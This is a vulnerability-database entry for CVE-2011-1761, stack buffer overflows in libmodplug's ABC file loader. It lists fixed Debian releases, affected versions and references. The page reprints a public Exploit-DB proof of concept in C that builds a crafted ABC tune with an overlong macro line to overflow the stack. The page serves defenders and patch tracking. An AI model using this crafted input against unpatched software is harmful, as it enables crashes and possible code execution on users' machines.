CVE-2011-1761
Description
Multiple stack-based buffer overflows in the (1) abc_new_macro and (2) abc_new_umacro functions in src/load_abc.cpp in libmodplug before 0.8.8.3 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted ABC file. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Libmodplug 0.8.8.2 - '.abc' Stack Buffer Overflow (PoC)
#include <libmodplug/modplug.h>
#include <stdio.h>
#include <string.h>
/*
libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc
http://modplug-xmms.sourceforge.net/
by: epiphant
this exploits one of many overflows in load_abc.cpp lol
vlc media player uses libmodplug
greets: defrost, babi, ming_wisher, emel1a, a.v., krs
date: 28 april 2011
tested on: centos 5.6
*/
int main(void)
{
char test[512] = "X: 1\nU: ";
unsigned int i;
i = strlen(test);
while (i < 278)
test[i++] = 'Q';
test[i++] = '1' + 32;
test[i++] = '3';
test[i++] = '3';
test[i++] = '4';
while (i < 286)
test[i++] = 'A';
test[i++] = '\n';
test[i] = '\0';
strcat(test, "T: Here Without You (Transcribed by: Bungee)\n");
strcat(test, "Z: 3 Doors Down\n");
strcat(test, "L: 1/4\n");
strcat(test, "Q: 108\n");
strcat(test, "K: C\n\n");
strcat(test, "[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8]\n");
i = strlen(test);
ModPlug_Load(test, i);
return 0;
}OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 1:0.8.8.4-1 |
| sid | Fixed | 1:0.8.8.4-1 |
| forky | Fixed | 1:0.8.8.4-1 |
| bullseye | Fixed | 1:0.8.8.4-1 |
| bookworm | Fixed | 1:0.8.8.4-1 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| konstanty_bialkowski | libmodplug | {"endIncluding":"0.8.8.2"} | |
| konstanty_bialkowski | libmodplug | 0.8 | |
| konstanty_bialkowski | libmodplug | 0.8.4 | |
| konstanty_bialkowski | libmodplug | 0.8.5 | |
| konstanty_bialkowski | libmodplug | 0.8.6 | |
| konstanty_bialkowski | libmodplug | 0.8.7 | |
| konstanty_bialkowski | libmodplug | 0.8.8 | |
| konstanty_bialkowski | libmodplug | 0.8.8.1 | |
References
- http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060520.html
- http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html
- http://secunia.com/advisories/44388
- http://secunia.com/advisories/44695
- http://secunia.com/advisories/44870
- http://secunia.com/advisories/45742
- http://secunia.com/advisories/48058
- http://ubuntu.com/usn/usn-1148-1
- http://www.debian.org/security/2012/dsa-2415
- http://www.exploit-db.com/exploits/17222
- http://www.openwall.com/lists/oss-security/2011/05/02/1
- http://www.openwall.com/lists/oss-security/2011/05/02/19
- http://www.osvdb.org/72157
- https://security-tracker.debian.org/tracker/CVE-2011-1761
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.